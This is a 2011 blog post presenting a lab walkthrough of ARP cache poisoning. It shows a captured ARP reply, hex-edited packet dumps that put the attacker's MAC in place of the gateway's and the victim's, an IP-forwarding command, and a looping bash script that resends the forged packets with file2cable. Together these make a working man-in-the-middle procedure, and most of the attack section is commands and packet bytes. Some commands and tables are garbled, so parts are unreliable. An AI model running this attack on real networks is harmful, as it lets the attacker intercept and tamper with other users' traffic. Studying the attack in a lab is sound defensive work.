Saturday, October 1, 2011

ARP Spoofing

ARP spoofing, also known as ARP cache poisoning or ARP poison routing (APR), is a technique used to attack a Local Area Network  (LAN) and it only effective if there is no tier security in place.

Principle of ARP Spoofing
To summarize, arp spoofing can be term as man in the middle attack or a DDOS attack as it will send a not existence MAC in the network. The diagram below will give you some idea of it.

 










To give you more an understanding on the packet, I decide to capture the info on my lab and it consists of different step and stage.

Stage 1: Collecting Packet information

1)The tools we use on this lab is wireshark, you can download the tools from the following Wireshark Download Page.
2)After you have perform the installation run the wireshark tools
 





3)Configure the interface for capturing packet












4)As per on screen, you will need to check on Capture packet in promiscuous mode which mean in the sniffing mode
5)After you have completed all the setting, click the start button and you will see some packet have been capture.




















6)You should be getting some packet as below, this would be our interest for our next step

Stage 2 : Analysis of the packet

This is the sample of the right content of the files.

Export the selected packet to /tmp/script/arp

Edit the files by typing this command (hexedit –b /tmp/script/arp)

Info                          Remark
Destination                     00 50 56 F4  78 89 (GW) @192.168.18.2
Target Ip add                  C0 A8   12 02  (GW) @ 192.168.18.2                   
Source                             00 0C   29 F1 EF DB  (Hacker) @ 192.168.18.139
Sender IP                        C0 A8 12 8B   (Hacker) @ 192.168.18.139
Victim                              00 0C 29 13 80 DD  @ 192.168.18.130
Victim IP                         C0 A8   12 82  (GW) @ 192.168.18.130                   

00000000  00 0C 29 F1  EF DB 00 50   56 F4 78 89  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 50   56 F4 78 89  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 F1  EF DB C0 A8   12 8B 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

Stage 3: Modify Packet

Start modify the victim packet

1)       hexedit –b  arp-victim

2)       replace hacker mac address with viticm mac  address

3)       replace gateway mac address with hacker mac address


Before Changing the packet

00000000  00 0C 29 F1  EF DB 00 50   56 F4 78 89  08 06 00 01   ..)....PV.x.....

00000010  08 00 06 04  00 02 00 50   56 F4 78 89  C0 A8 12 02   .......PV.x.....

00000020  00 0C 29 F1  EF DB C0 A8   12 8B 00 00  00 00 00 00   ..).............

00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............


After Changing the packet

00000000 00 0C 29 13 80 DD 00 0C 29 F1  EF DB  08 06 00 01   ..)....PV.x.....

00000010  08 00 06 04  00 02 00 0C 29 F1  EF DB  C0 A8 12 02   .......PV.x.....

00000020  00 0C 29 13 80 DD C0 A8   12 82 00 00  00 00 00 00   ..).............

00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............


Save the files as arp-victim and sent the files to the victim

file2cable -v -i eth0 -f arp-victim



Summary

Before packet been modified

Hacker Mac
Gateway Mac
X
X
Gateway Mac
Gateway IP address
Hacker Mac
Hacker IP
x

 
After packet been modified
Victim Mac
Hacker Mac
x
x
Hacker Mac
Gateway Ip address
Victim Mac
Victim Ip address
x
Stage 4: Modify Gateway packet
1)Cp arp-victim arp-gateway

2)Hexedit –b arp-gateway


Before Changing the packet

00000000 00 0C 29 13 80 DD 00 0C 29 F1  EF DB  08 06 00 01   ..)....PV.x.....

00000010  08 00 06 04  00 02 00 0C 29 F1  EF DB  C0 A8 12 02   .......PV.x.....

00000020  00 0C 29 13 80 DD C0 A8   12 82 00 00  00 00 00 00   ..).............

00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............


After Changing the packet
00000000 00 50 56 F4  78 89 00 0C 29 F1  EF DB  08 06 00 01   ..)....PV.x.....

00000010  08 00 06 04  00 02 00 0C 29 F1  EF DB  C0 A8 12 82   .......PV.x.....

00000020  00 50 56 F4  78 89 C0 A8   12 02 00 00  00 00 00 00   ..).............

00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

Enable IP forwarding on the backtrack

Echo 1 > /proc/sys/net/ipv4/ip_forward

Nano doarp.sh

Chmod 700 doarp.sh

#!/bin/bash

While [ 1 ];do

File2cable –I eth0 –f arp-victim

File2cable –I eth0 –f arp-gateway

Sleep 2

Done
Summary

Before packet been modified
Victim Mac
Hacker Mac
x
x
Hacker Mac
Gateway Ip address
Victim Mac
Victim IP
x

After packet been modified
Gateway Mac
Hacker Mac
x
x
Hacker Mac
Victim Ip address
Gateway  Mac
Gateway IP
x



No comments:

Post a Comment